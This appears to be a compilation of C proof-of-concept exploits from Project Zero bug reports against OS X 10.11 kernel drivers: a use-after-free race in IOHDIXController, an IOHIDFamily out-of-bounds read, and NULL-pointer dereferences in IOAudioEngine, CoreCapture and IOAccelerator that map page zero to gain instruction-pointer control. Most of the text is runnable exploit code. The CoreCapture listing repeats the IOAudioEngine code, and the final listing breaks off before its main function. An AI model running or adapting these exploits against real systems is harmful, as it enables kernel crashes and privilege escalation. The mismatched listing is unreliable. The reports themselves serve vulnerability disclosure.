This is perhaps a more interesting UaF than just racing testNetBootMethod calls as there looks to be a path to getting free'd memory disclosed back to userspace.

Although the copyProperty macro used by is_io_registry_entry_get_property_bin takes the entry's properties lock before reading and
taking a reference on the property the testNetBootMethod external method directly calls the overriden setProperty without
taking that same lock. ::setProperty calls ::release on all the properties before nulling them out then replacing them
with new objects - we can get a UAF if we can get that ::release call to happen before the ::retain in copyProperty.

This PoC will crash as a UaF but with more care I believe you could get the OSSerialize to serialize an invalid object
leading to a nice kernel memory disclosure.

Tested on OS X 10.11.3 El Capitan 15D21 on MacBookAir5,2
*/

//ianbeer

//build: clang -o hdix_race_get_set hdix_race_get_set.c -framework IOKit -framework Foundation -lpthread

/*
OS X/iOS kernel UAF racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient

This is perhaps a more interesting UaF than just racing testNetBootMethod calls as there looks to be a path to getting free'd memory disclosed back to userspace.

Although the copyProperty macro used by is_io_registry_entry_get_property_bin takes the entry's properties lock before reading and
taking a reference on the property the testNetBootMethod external method directly calls the overriden setProperty without
taking that same lock. ::setProperty calls ::release on all the properties before nulling them out then replacing them
with new objects - we can get a UAF if we can get that ::release call to happen before the ::retain in copyProperty.

This PoC will crash as a UaF but with more care I believe you could get the OSSerialize to serialize an invalid object
leading to a nice kernel memory disclosure.

Tested on OS X 10.11.3 El Capitan 15D21 on MacBookAir5,2
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <IOKit/IOKitLib.h>

#include <libkern/OSAtomic.h>

#include <mach/thread_act.h>

#include <pthread.h>

#include <mach/mach.h>
#include <mach/vm_map.h>
#include <sys/mman.h>

#include <CoreFoundation/CoreFoundation.h>
    
/* Request state shared between main() (which fills it in through set_params)
 * and the worker thread (which replays it through make_iokit_call). */
unsigned int selector = 0;   /* external-method selector; set_params uses 4, presumably testNetBootMethod (see header) */

uint64_t inputScalar[16];
size_t inputScalarCnt = 0;

uint8_t inputStruct[4096];   /* struct input: the NUL-terminated 'A' payload copied in by set_params */
size_t inputStructCnt = 0; 

uint64_t outputScalar[16] = {0};
uint32_t outputScalarCnt = 0;

char outputStruct[4096] = {0};
size_t outputStructCnt = 0;

io_connect_t global_conn = MACH_PORT_NULL;   /* IOHDIXController user client opened in main() */

void set_params(io_connect_t conn){
  /*
   * Point the shared request state at `conn` and load the call the worker
   * thread will replay: selector 4, no scalars, one NUL-terminated string of
   * 'A's as the struct input, nothing expected back.
   */
  static const char kPayload[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

  global_conn = conn;
  selector = 4;

  inputScalarCnt = 0;
  inputStructCnt = sizeof kPayload;             /* strlen + 1: the NUL travels too */
  memcpy(inputStruct, kPayload, inputStructCnt);

  outputScalarCnt = 0;
  outputStructCnt = 0;
}

void make_iokit_call(){
  /*
   * Issue the external-method call described by the shared globals (see
   * set_params).  The result is deliberately ignored: only the kernel-side
   * setProperty side effect matters for the race.
   */
  kern_return_t kr = IOConnectCallMethod(global_conn, selector,
                                         inputScalar, inputScalarCnt,
                                         inputStruct, inputStructCnt,
                                         outputScalar, &outputScalarCnt,
                                         outputStruct, &outputStructCnt);
  (void)kr;
}

/* Crude hand-off between main() and the worker: main() releases the lock
 * once per getProperty attempt and the worker takes it for one setProperty
 * call, so the two kernel paths run roughly in lock-step. */
OSSpinLock lock = OS_SPINLOCK_INIT;

void* thread_func(void* arg){
  (void)arg;
  for (;;) {
    /* Spin until main() lets an iteration through; the lock is never
     * handed back from this side. */
    while (!OSSpinLockTry(&lock)) {
    }
    make_iokit_call();
  }
  return NULL;
}

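int main(int argc, char** argv){
  (void)argc;
  (void)argv;

  /* Hold the lock before the worker starts so it cannot call in before the
   * connection exists. */
  OSSpinLockLock(&lock);

  pthread_t t;
  pthread_create(&t, NULL, thread_func, NULL);

  mach_port_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
                                                    IOServiceMatching("IOHDIXController"));
  if (service == MACH_PORT_NULL) {
    printf("IOHDIXController not found\n");
    return 1;
  }

  mach_port_t conn = MACH_PORT_NULL;
  kern_return_t err = IOServiceOpen(service, mach_task_self(), 0, &conn);
  if (err != KERN_SUCCESS) {
    printf("IOServiceOpen failed: %x\n", err);
    return 1;
  }

  set_params(conn);
  for(;;) {
    /* Let the worker fire one setProperty while we read the property. */
    OSSpinLockUnlock(&lock);
    CFTypeRef p = IORegistryEntryCreateCFProperty(service,
                                                  CFSTR("di-root-image-result"),
                                                  kCFAllocatorDefault,
                                                  0);
    /* The property comes back at +1; the original never released it, so the
     * infinite loop leaked one object per iteration. */
    if (p) {
      CFRelease(p);
    }
  }
  return 0;
}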
            
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=774

The IOHIDFamily function IOHIDDevice::handleReportWithTime takes an attacker-controlled, unchecked IOHIDReportType enum,
which was cast from an int in either IOHIDLibUserClient::_setReport or _getReport:

            ret = target->setReport(arguments->structureInput, arguments->structureInputSize, (IOHIDReportType)arguments->scalarInput[0]

handleReportWithTime only checks that the enum is <= the max, but enums are really just (signed) ints so there needs to be a lower-bounds
check here too:

    if ( reportType >= kIOHIDReportTypeCount )
              return kIOReturnBadArgument;

reportType is then used here:
        element = GetHeadElement( GetReportHandlerSlot(reportID),
                                  reportType);

        while ( element ) {
            shouldTickle |= element->shouldTickleActivity();
            changed |= element->processReport( reportID,

where GetHeadElement is defined as:

#define GetHeadElement(slot, type)  _reportHandlers[slot].head[type]

This leads to an OOB read off the head array followed by virtual function calls

Tested on OS X 10.11.4 (15E65) on MacBookAir 5,2

Note that repro'ing this might be more involved on other models as there are a lot of different HID devices and drivers.

I can provide panic logs if required.
*/

// ianbeer

// clang -o hidlib_oob hidlib_oob.c -framework IOKit -framework CoreFoundation

/*
OS X kernel OOB read of object pointer due to insufficient checks in raw cast to enum type

The IOHIDFamily function IOHIDDevice::handleReportWithTime takes an attacker-controlled, unchecked IOHIDReportType enum,
which was cast from an int in either IOHIDLibUserClient::_setReport or _getReport:

            ret = target->setReport(arguments->structureInput, arguments->structureInputSize, (IOHIDReportType)arguments->scalarInput[0]

handleReportWithTime only checks that the enum is <= the max, but enums are really just (signed) ints so there needs to be a lower-bounds
check here too:

    if ( reportType >= kIOHIDReportTypeCount )
              return kIOReturnBadArgument;

reportType is then used here:
        element = GetHeadElement( GetReportHandlerSlot(reportID),
                                  reportType);

        while ( element ) {
            shouldTickle |= element->shouldTickleActivity();
            changed |= element->processReport( reportID,

where GetHeadElement is defined as:

#define GetHeadElement(slot, type)  _reportHandlers[slot].head[type]

This leads to an OOB read off the head array followed by virtual function calls

Tested on OS X 10.11.4 (15E65) on MacBookAir 5,2

Note that repro'ing this might be more involved on other models as there are a lot of different HID devices and drivers.

I can provide panic logs if required.
*/

#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <unistd.h>

#include <libkern/OSAtomic.h>
#include <mach/mach_error.h>

#include <IOKit/IOKitLib.h>
#include <CoreFoundation/CoreFoundation.h>

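io_connect_t get_user_client(const char* name, int type) {
  /*
   * Find an IOService called `name` and open a user client of `type` on it.
   *
   * Three lookups are tried in turn: an exact class match, an exact
   * registry-name match, and finally a scan of every IOService for a class
   * name that merely contains `name`.
   *
   * Returns the connection, or MACH_PORT_NULL if nothing matched or
   * IOServiceOpen failed.  Intermediate registry objects are released.
   *
   * Fix: the iterator is initialised and the return value of
   * IOServiceGetMatchingServices is checked; the original walked an
   * uninitialised iterator if that call failed.
   */
  kern_return_t err;
  CFDictionaryRef matching;
  io_service_t service;

  // try IOServiceMatching
  matching = IOServiceMatching(name);
  service = IOServiceGetMatchingService(kIOMasterPortDefault, matching); // consumes a ref on matching

  if (service == MACH_PORT_NULL) {
    // try IOServiceNameMatching
    matching = IOServiceNameMatching(name);
    service = IOServiceGetMatchingService(kIOMasterPortDefault, matching);
  }

  if (service == MACH_PORT_NULL) {
    // try everything and look for a partial name match
    matching = IOServiceMatching("IOService");
    io_iterator_t iterator = IO_OBJECT_NULL;
    err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
    if (err != KERN_SUCCESS) {
      printf("IOServiceGetMatchingServices failed: %s\n", mach_error_string(err));
      return MACH_PORT_NULL;
    }

    int found_it = 0;
    while ((service = IOIteratorNext(iterator)) != IO_OBJECT_NULL) {
      io_name_t object_name;
      IOObjectGetClass(service, object_name);
      if (strstr(object_name, name)) {
        found_it = 1;   // keep this service's reference; released after IOServiceOpen
        break;
      }
      IOObjectRelease(service);
    }
    IOObjectRelease(iterator);

    if (!found_it) {
      // couldn't find any matches for the name anywhere
      return MACH_PORT_NULL;
    }
  }

  io_connect_t conn = MACH_PORT_NULL;

  err = IOServiceOpen(service, mach_task_self(), type, &conn);
  if (err != KERN_SUCCESS){
    printf("IOServiceOpen failed: %s\n", mach_error_string(err));
    IOObjectRelease(service);
    return MACH_PORT_NULL;
  }
  IOObjectRelease(service);   // the connection holds its own reference

  return conn;
}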

kern_return_t poc(io_connect_t client){
  /*
   * Invoke external method 12 -- one of the _setReport/_getReport entry
   * points named in the header comment; which one is not verified here --
   * with a report type of 0xe0000000.  Once cast to the signed
   * IOHIDReportType enum that value is negative, so it passes the
   * `>= kIOHIDReportTypeCount` check and indexes `head[]` out of bounds.
   *
   * client: open user client on the HID device.
   * Returns the IOKit status of the call.
   */
  enum { kSelector = 12, kBufSize = 4096 };

  uint64_t scalars_in[16] = {
    0xe0000000,   /* report type: negative as an enum, no lower-bounds check */
    0x00a90000,   /* second scalar as in the original PoC (meaning not verified) */
    0
  };
  size_t scalars_in_cnt = 3;

  uint8_t  struct_in[kBufSize];
  size_t   struct_in_cnt = 0;

  uint64_t scalars_out[16];
  uint32_t scalars_out_cnt = 0;

  char     struct_out[kBufSize];
  size_t   struct_out_cnt = 0x1000;   /* == kBufSize */

  return IOConnectCallMethod(client, kSelector,
                             scalars_in, scalars_in_cnt,
                             struct_in, struct_in_cnt,
                             scalars_out, &scalars_out_cnt,
                             struct_out, &struct_out_cnt);
}


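int main(int argc, char** argv){
  (void)argc;
  (void)argv;

  io_connect_t client = get_user_client("AppleUSBTCButtons", 0);
  if (client == MACH_PORT_NULL) {
    printf("no client\n");
    return 1;
  }

  /* Report the status instead of discarding it: a clean return usually
   * means this device/driver did not take the vulnerable path (the header
   * notes the repro is hardware dependent), which is worth knowing. */
  kern_return_t kr = poc(client);
  printf("poc returned: %s\n", mach_error_string(kr));

  IOServiceClose(client);
  return 0; 
}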
            
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=776

IOAudioEngineUserClient::closeClient sets the audioEngine member pointer to NULL

IOReturn IOAudioEngineUserClient::closeClient()
{
    audioDebugIOLog(3, "+ IOAudioEngineUserClient[%p]::closeClient()\n", this);

    if (audioEngine && !isInactive()) {
        if (isOnline()) {
            stopClient();
        }
        audioEngine->clientClosed(this);
        audioEngine = NULL;



External method 0 uses audioEngine without checking if it's NULL:

IOReturn IOAudioEngineUserClient::safeRegisterClientBuffer(UInt32 audioStreamIndex, void * sourceBuffer, UInt32 bufSizeInBytes, UInt32 bufferSetID) {

  audioDebugIOLog(3, "IOAudioEngineUserClient::safeRegisterClientBuffer deprecated for 32 bit %p \n", sourceBuffer); 
  IOAudioStream *         audioStream;
  IOReturn            result = kIOReturnBadArgument;
  
  audioDebugIOLog(3, "+ IOAudioEngineUserClient::safeRegisterClientBuffer32 %p \n", sourceBuffer); 
  
  audioStream = audioEngine->getStreamForID(audioStreamIndex);


Whilst that isn't a virtual method, getStreamForID does call a virtual function on a member:

IOAudioStream * IOAudioEngine::getStreamForID(UInt32 streamID) {
  IOAudioStream *     stream = NULL;

  assert(reserved);
  if (reserved->streams) {
    stream = OSDynamicCast (IOAudioStream, reserved->streams->getObject(streamID));
  }

  return stream;
}

getObject is a virtual function, and reserved will be read from the NULL page giving us easy RIP control.

tested on OS X 10.11.4 (15E65) MacBookAir 5,2
*/

// ianbeer

// clang -o ioaudio_race ioaudio_race.c -framework IOKit -m32 -lpthread -pagezero_size 0x0

/*
OS X exploitable kernel NULL pointer dereference in IOAudioEngine

IOAudioEngineUserClient::closeClient sets the audioEngine member pointer to NULL

IOReturn IOAudioEngineUserClient::closeClient()
{
    audioDebugIOLog(3, "+ IOAudioEngineUserClient[%p]::closeClient()\n", this);

    if (audioEngine && !isInactive()) {
        if (isOnline()) {
            stopClient();
        }
        audioEngine->clientClosed(this);
        audioEngine = NULL;



External method 0 uses audioEngine without checking if it's NULL:

IOReturn IOAudioEngineUserClient::safeRegisterClientBuffer(UInt32 audioStreamIndex, void * sourceBuffer, UInt32 bufSizeInBytes, UInt32 bufferSetID) {

  audioDebugIOLog(3, "IOAudioEngineUserClient::safeRegisterClientBuffer deprecated for 32 bit %p \n", sourceBuffer); 
  IOAudioStream *         audioStream;
  IOReturn            result = kIOReturnBadArgument;
  
  audioDebugIOLog(3, "+ IOAudioEngineUserClient::safeRegisterClientBuffer32 %p \n", sourceBuffer); 
  
  audioStream = audioEngine->getStreamForID(audioStreamIndex);


Whilst that isn't a virtual method, getStreamForID does call a virtual function on a member:

IOAudioStream * IOAudioEngine::getStreamForID(UInt32 streamID) {
  IOAudioStream *     stream = NULL;

  assert(reserved);
  if (reserved->streams) {
    stream = OSDynamicCast (IOAudioStream, reserved->streams->getObject(streamID));
  }

  return stream;
}

getObject is a virtual function, and reserved will be read from the NULL page giving us easy RIP control.

tested on OS X 10.11.4 (15E65) MacBookAir 5,2
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <IOKit/IOKitLib.h>

#include <libkern/OSAtomic.h>

#include <mach/thread_act.h>

#include <pthread.h>

#include <mach/mach.h>
#include <mach/vm_map.h>
#include <sys/mman.h>
    
/* File-scope argument block for IOConnectCallMethod(); filled in by
 * set_params() on the main thread and consumed by make_iokit_call() on the
 * worker thread. All arrays have static storage, so they start zeroed. */
unsigned int selector = 0;                  /* external method index */

uint64_t inputScalar[16];                   /* scalar inputs; only the first inputScalarCnt are sent */
size_t inputScalarCnt = 0;

uint8_t inputStruct[40960];                 /* structure input buffer and its byte count */
size_t inputStructCnt = 0; 

uint64_t outputScalar[16] = {0};            /* scalar output buffer; the count is passed by address */
uint32_t outputScalarCnt = 0;

char outputStruct[40960] = {0};             /* structure output buffer; the count is passed by address */
size_t outputStructCnt = 0;

io_connect_t global_conn = MACH_PORT_NULL;  /* user client connection the worker calls into */

/* Publish the connection and the argument shape used by make_iokit_call():
 * external method 0 with four scalar inputs, no structure input, and
 * capacity for 16 scalar / 40960 structure output bytes. Only writes the
 * file-scope globals; returns nothing. */
void set_params(io_connect_t conn)
{
  /* output capacities (passed by address in make_iokit_call()) */
  outputScalarCnt = 16;
  outputStructCnt = 40960;

  /* input shape */
  inputStructCnt = 0;
  inputScalarCnt = 4;

  selector = 0;
  global_conn = conn;
}

/* Issue the external method call described by the globals above.
 * The kern_return_t result is discarded: the PoC only cares whether the
 * kernel dereferences the NULL audioEngine pointer (see header comment),
 * not what the call returns. Called from thread_func() once the lock
 * handshake with main() completes. */
void make_iokit_call(){  
  IOConnectCallMethod(
      global_conn,
      selector,
      inputScalar,
      inputScalarCnt,
      inputStruct,
      inputStructCnt,
      outputScalar,
      &outputScalarCnt,   /* capacity in; passed by address */
      outputStruct,
      &outputStructCnt);  /* capacity in; passed by address */
}

/* Start-gate for the race: main() holds it while setting up, the worker in
 * thread_func() spins on it and fires the call as soon as main() unlocks. */
OSSpinLock lock = OS_SPINLOCK_INIT;

/* Worker thread body: busy-wait until `lock` can be taken (i.e. until main()
 * has published the parameters and released it), then issue the IOKit call
 * so it overlaps with the IOServiceClose() on the main thread.
 * `arg` is unused; always returns NULL. The lock is never released here. */
void* thread_func(void* arg){
  (void)arg;

  /* OSSpinLockTry() returns non-zero once the lock has been acquired. */
  while (OSSpinLockTry(&lock) == 0) {
  }

  // usleep(1);

  make_iokit_call();
  return NULL;
}

/* Open a user client of the given `type` on the first IOService whose class
 * matches `name`. Returns the connection port, or 0 (== MACH_PORT_NULL)
 * after printing a diagnostic when any step fails. The matching dictionary
 * is consumed by IOServiceGetMatchingServices(); the iterator and service
 * handles obtained here are never released. */
mach_port_t get_user_client(char* name, int type) {
  CFMutableDictionaryRef dict = IOServiceMatching(name);
  if (dict == NULL) {
    printf("unable to create service matching dictionary\n");
    return 0;
  }

  io_iterator_t iter;
  kern_return_t kr = IOServiceGetMatchingServices(kIOMasterPortDefault, dict, &iter);
  if (kr != KERN_SUCCESS) {
    printf("no matches\n");
    return 0;
  }

  /* Only the first match is considered. */
  io_service_t svc = IOIteratorNext(iter);
  if (svc == IO_OBJECT_NULL) {
    printf("unable to find service\n");
    return 0;
  }
  printf("got service: %x\n", svc);

  io_connect_t conn = MACH_PORT_NULL;
  kr = IOServiceOpen(svc, mach_task_self(), type, &conn);
  if (kr != KERN_SUCCESS) {
    printf("unable to get user client connection\n");
    return 0;
  }
  printf("got userclient connection: %x\n", conn);

  return conn;
}

/* Entry point.
 * 1. Remap virtual page 0 read/write — possible only because the binary is
 *    linked with -pagezero_size 0x0 (see the build line above) — and fill it.
 * 2. Plant a pointer-sized marker at offset 0x28 of that page.
 * 3. Start the worker, open the IOAudioEngine user client, publish the call
 *    parameters, release the worker and immediately close the connection so
 *    the external method and IOServiceClose() overlap.
 * Note: the worker is never joined, so main() can return (and the process
 * exit) before the call is made; the later listings loop and join instead. */
int main(int argc, char** argv){
  kern_return_t err;
  // re map the null page rw
  int var = 0;   /* unused */
  err = vm_deallocate(mach_task_self(), 0x0, 0x1000);
  if (err != KERN_SUCCESS){
    printf("%x\n", err);   /* not fatal: execution continues regardless */
  }
  vm_address_t addr = 0;
  /* flags 0 == VM_FLAGS_FIXED: allocate exactly at address 0 */
  err = vm_allocate(mach_task_self(), &addr, 0x1000, 0);
  if (err != KERN_SUCCESS){
    if (err == KERN_INVALID_ADDRESS){
      printf("invalid address\n");
    }
    if (err == KERN_NO_SPACE){
      printf("no space\n");
    }
    printf("%x\n", err);   /* also not fatal; the stores below would then fault */
  }
  char* np = 0;
  for (int i = 0; i < 0x1000; i++){
    np[i] = '\xff';
  }

  /* Presumably the offset at which the kernel reads `reserved` from the NULL
   * page (see header comment); the value is chosen to be recognisable in a
   * panic log — confirm against the referenced report. */
  *((uint64_t*)0x28) = 0xffffff4141414141;


  OSSpinLockLock(&lock);   /* worker spins on this until set_params() is done */

  pthread_t t;
  pthread_create(&t, NULL, thread_func, NULL);


  mach_port_t conn = get_user_client("IOAudioEngine", 0);
  
  set_params(conn);        /* conn may be 0 if get_user_client() failed */
  OSSpinLockUnlock(&lock);
  IOServiceClose(conn);

}
            
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=777

Pretty much all the external methods of CoreCaptureUserClient call CoreCaptureUserClient::stashGet passing an attacker controlled key.

If that key isn't in the list of stashed objects then stashGet returns a NULL pointer. No callers actually check
the return value though which leads immediately to a call to a virtual method on a NULL pointer. By mapping the NULL
page we can get trivial RIP control.

Tested on OS X 10.11.4 (15E65) on MacBookAir 5,2
*/

// ianbeer

//clang -o CoreCaptureNull CoreCaptureNull.c -framework IOKit -m32 -lpthread -pagezero_size 0x0

/*
OS X exploitable kernel NULL dereference in CoreCaptureResponder due to unchecked return value

Pretty much all the external methods of CoreCaptureUserClient call CoreCaptureUserClient::stashGet passing an attacker controlled key.

If that key isn't in the list of stashed objects then stashGet returns a NULL pointer. No callers actually check
the return value though which leads immediately to a call to a virtual method on a NULL pointer. By mapping the NULL
page we can get trivial RIP control.

Tested on OS X 10.11.4 (15E65) on MacBookAir 5,2
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <IOKit/IOKitLib.h>

#include <libkern/OSAtomic.h>

#include <mach/mach.h>
#include <mach/vm_map.h>
#include <sys/mman.h>
    
/* File-scope argument block for IOConnectCallMethod(); written by
 * set_params() on the main thread, read by make_iokit_call() on the worker.
 * Static storage, so everything starts zeroed. */
unsigned int selector = 0;                  /* external method index */

uint64_t inputScalar[16];                   /* scalar inputs; first inputScalarCnt are sent */
size_t inputScalarCnt = 0;

uint8_t inputStruct[40960];                 /* structure input buffer and byte count */
size_t inputStructCnt = 0; 

uint64_t outputScalar[16] = {0};            /* scalar output buffer; count passed by address */
uint32_t outputScalarCnt = 0;

char outputStruct[40960] = {0};             /* structure output buffer; count passed by address */
size_t outputStructCnt = 0;

io_connect_t global_conn = MACH_PORT_NULL;  /* user client connection used by the worker */

/* Record the connection and the argument shape for make_iokit_call():
 * method 0, four scalar inputs, no structure input, 16 scalar / 40960
 * structure output bytes of capacity. Touches only the file-scope globals. */
void set_params(io_connect_t conn)
{
  global_conn = conn;

  /* inputs */
  inputScalarCnt = 4;
  inputStructCnt = 0;

  /* output capacities */
  outputStructCnt = 40960;
  outputScalarCnt = 16;

  selector = 0;
}

/* Issue the external method call described by the globals above; the
 * kern_return_t result is ignored. Runs on the worker thread once main()
 * releases `lock`. */
void make_iokit_call(){  
  IOConnectCallMethod(
      global_conn,
      selector,
      inputScalar,
      inputScalarCnt,
      inputStruct,
      inputStructCnt,
      outputScalar,
      &outputScalarCnt,   /* capacity in; passed by address */
      outputStruct,
      &outputStructCnt);  /* capacity in; passed by address */
}

/* Start-gate: main() holds it during setup, thread_func() spins on it. */
OSSpinLock lock = OS_SPINLOCK_INIT;

/* Worker thread: spin until `lock` can be acquired (main() releases it right
 * after set_params()), then make the IOKit call so it overlaps with the
 * IOServiceClose() on the main thread. `arg` is unused; returns NULL.
 * The lock is not released afterwards. */
void* thread_func(void* arg){
  (void)arg;

  /* non-zero return from OSSpinLockTry() means we now own the lock */
  while (OSSpinLockTry(&lock) == 0) {
  }

  // usleep(1);

  make_iokit_call();
  return NULL;
}

/* Open user client `type` on the first IOService matching class `name`.
 * Returns the connection port, or 0 (MACH_PORT_NULL) after printing a
 * diagnostic if any step fails. The matching dictionary is consumed by
 * IOServiceGetMatchingServices(); iterator and service handles are not
 * released. */
mach_port_t get_user_client(char* name, int type) {
  CFMutableDictionaryRef match = IOServiceMatching(name);
  if (match == NULL) {
    printf("unable to create service matching dictionary\n");
    return 0;
  }

  io_iterator_t it;
  kern_return_t rc = IOServiceGetMatchingServices(kIOMasterPortDefault, match, &it);
  if (rc != KERN_SUCCESS) {
    printf("no matches\n");
    return 0;
  }

  io_service_t svc = IOIteratorNext(it);   /* first match only */
  if (svc == IO_OBJECT_NULL) {
    printf("unable to find service\n");
    return 0;
  }
  printf("got service: %x\n", svc);

  io_connect_t conn = MACH_PORT_NULL;
  rc = IOServiceOpen(svc, mach_task_self(), type, &conn);
  if (rc != KERN_SUCCESS) {
    printf("unable to get user client connection\n");
    return 0;
  }
  printf("got userclient connection: %x\n", conn);

  return conn;
}

/* Entry point: remap page 0 read/write (requires the -pagezero_size 0x0
 * build shown above), fill it, plant a marker at offset 0x28, then race a
 * worker's external method call against IOServiceClose().
 * NOTE(review): this file's header describes CoreCaptureUserClient, but the
 * service opened below is "IOAudioEngine" and the body is identical to the
 * preceding IOAudioEngine listing — it looks like the wrong source was
 * attached; confirm against the referenced bug report. The worker thread
 * is never joined, so the process may exit before the call is made. */
int main(int argc, char** argv){
  kern_return_t err;
  // re map the null page rw
  int var = 0;   /* unused */
  err = vm_deallocate(mach_task_self(), 0x0, 0x1000);
  if (err != KERN_SUCCESS){
    printf("%x\n", err);   /* not fatal */
  }
  vm_address_t addr = 0;
  /* flags 0 == VM_FLAGS_FIXED: allocate exactly at address 0 */
  err = vm_allocate(mach_task_self(), &addr, 0x1000, 0);
  if (err != KERN_SUCCESS){
    if (err == KERN_INVALID_ADDRESS){
      printf("invalid address\n");
    }
    if (err == KERN_NO_SPACE){
      printf("no space\n");
    }
    printf("%x\n", err);   /* also not fatal; the stores below would then fault */
  }
  char* np = 0;
  for (int i = 0; i < 0x1000; i++){
    np[i] = '\xff';
  }

  /* presumably the page-0 offset the kernel reads a pointer from; the value
   * is chosen to be recognisable in a panic log — confirm against the report */
  *((uint64_t*)0x28) = 0xffffff4141414141;


  OSSpinLockLock(&lock);   /* worker spins on this until set_params() is done */

  pthread_t t;
  pthread_create(&t, NULL, thread_func, NULL);


  mach_port_t conn = get_user_client("IOAudioEngine", 0);
  
  set_params(conn);        /* conn may be 0 if get_user_client() failed */
  OSSpinLockUnlock(&lock);
  IOServiceClose(conn);

}
            
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=778

IOAccelerator external method IOAccelSharedUserClient2::page_off_resource uses the pointer at this+0x100 without checking if it's NULL.
A series of dereferences from this pointer lead to trivial RIP control.

We can race two threads, in one call the external method and in the other call IOServiceClose, which NULLs out the pointer at
this+0x100.

By mapping the NULL page into userspace we can control the pointer read.

tested on OS X 10.11.4 (15E65) on MacBookAir 5,2
*/

//ianbeer

//clang -o ioaccel_race ioaccel_race.c -framework IOKit -m32 -lpthread -pagezero_size 0x0

/*
OS X exploitable kernel NULL dereference in IOAccelSharedUserClient2::page_off_resource

IOAccelerator external method IOAccelSharedUserClient2::page_off_resource uses the pointer at this+0x100 without checking if it's NULL.
A series of dereferences from this pointer lead to trivial RIP control.

We can race two threads, in one call the external method and in the other call IOServiceClose, which NULLs out the pointer at
this+0x100.

By mapping the NULL page into userspace we can control the pointer read.

tested on OS X 10.11.4 (15E65) on MacBookAir 5,2
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <IOKit/IOKitLib.h>

#include <libkern/OSAtomic.h>

#include <mach/thread_act.h>

#include <pthread.h>

#include <mach/mach.h>
#include <mach/vm_map.h>
#include <sys/mman.h>
    
/* File-scope argument block for IOConnectCallMethod(); set_params() fills
 * it on the main thread, make_iokit_call() reads it on the worker.
 * Static storage, so all of it starts zeroed. */
unsigned int selector = 0;                  /* external method index */

uint64_t inputScalar[16];                   /* scalar inputs; first inputScalarCnt are sent */
size_t inputScalarCnt = 0;

uint8_t inputStruct[40960];                 /* structure input buffer and byte count */
size_t inputStructCnt = 0; 

uint64_t outputScalar[16] = {0};            /* scalar output buffer; count passed by address */
uint32_t outputScalarCnt = 0;

char outputStruct[40960] = {0};             /* structure output buffer; count passed by address */
size_t outputStructCnt = 0;

io_connect_t global_conn = MACH_PORT_NULL;  /* user client connection used by the worker */

/* Record the connection and the argument shape for make_iokit_call():
 * method 2 with an 8-byte structure input and no scalar inputs or outputs
 * (all output capacities zero). Writes only the file-scope globals. */
void set_params(io_connect_t conn)
{
  selector = 2;

  /* inputs: structure only */
  inputStructCnt = 8;
  inputScalarCnt = 0;

  /* no output expected */
  outputStructCnt = 0;
  outputScalarCnt = 0;

  global_conn = conn;
}

/* Issue the external method call described by the globals above; the
 * kern_return_t result is ignored. Runs on the worker thread after the
 * lock handshake in poc(). */
void make_iokit_call(){  
  IOConnectCallMethod(
      global_conn,
      selector,
      inputScalar,
      inputScalarCnt,
      inputStruct,
      inputStructCnt,
      outputScalar,
      &outputScalarCnt,   /* capacity in; passed by address */
      outputStruct,
      &outputStructCnt);  /* capacity in; passed by address */
}

/* Start-gate: poc() holds it during setup, thread_func() spins on it.
 * Note that thread_func() in this file never releases it again. */
OSSpinLock lock = OS_SPINLOCK_INIT;

/* Worker thread: spin until `lock` can be taken (poc() releases it right
 * after set_params()), then make the IOKit call so it overlaps with the
 * IOServiceClose() on the main thread. `arg` unused; returns NULL.
 * The lock is kept, not released. */
void* thread_func(void* arg){
  (void)arg;

  /* non-zero from OSSpinLockTry() means the lock is ours */
  while (OSSpinLockTry(&lock) == 0) {
  }

  // usleep(1);

  make_iokit_call();
  return NULL;
}

/* Open user client `type` on the first IOService whose class matches
 * `name`. Returns the connection port, or 0 (MACH_PORT_NULL) after printing
 * a diagnostic if any step fails. The matching dictionary is consumed by
 * IOServiceGetMatchingServices(); the iterator and service handles are
 * never released. */
mach_port_t get_user_client(char* name, int type) {
  CFMutableDictionaryRef dict = IOServiceMatching(name);
  if (dict == NULL) {
    printf("unable to create service matching dictionary\n");
    return 0;
  }

  io_iterator_t iter;
  kern_return_t kr = IOServiceGetMatchingServices(kIOMasterPortDefault, dict, &iter);
  if (kr != KERN_SUCCESS) {
    printf("no matches\n");
    return 0;
  }

  /* first match only */
  io_service_t svc = IOIteratorNext(iter);
  if (svc == IO_OBJECT_NULL) {
    printf("unable to find service\n");
    return 0;
  }
  printf("got service: %x\n", svc);

  io_connect_t conn = MACH_PORT_NULL;
  kr = IOServiceOpen(svc, mach_task_self(), type, &conn);
  if (kr != KERN_SUCCESS) {
    printf("unable to get user client connection\n");
    return 0;
  }
  printf("got userclient connection: %x\n", conn);

  return conn;
}

/* One race attempt: hold the lock, start the worker (which spins on it),
 * open user client type 6 on IntelAccelerator, publish the parameters, then
 * release the worker and close the connection back-to-back so the external
 * method and IOServiceClose() overlap. Joins the worker before returning.
 * Note: thread_func() in this file never unlocks `lock`, so a second call
 * to poc() would spin forever in OSSpinLockLock(); the loop in main()
 * presumably relies on the first attempt panicking the kernel (the later
 * listings' workers do unlock). */
void poc(){
  OSSpinLockLock(&lock);

  pthread_t t;
  pthread_create(&t, NULL, thread_func, NULL);


  mach_port_t conn = get_user_client("IntelAccelerator", 6);
  
  set_params(conn);        /* conn may be 0 if get_user_client() failed */
  OSSpinLockUnlock(&lock); /* releases the worker */
  IOServiceClose(conn);
  pthread_join(t, NULL);
}

/* Entry point: remap virtual page 0 read/write (only possible because the
 * binary is linked with -pagezero_size 0x0, see the build line above), fill
 * it with 0x41 bytes, then call poc() forever. The trailing `return 0` is
 * unreachable. */
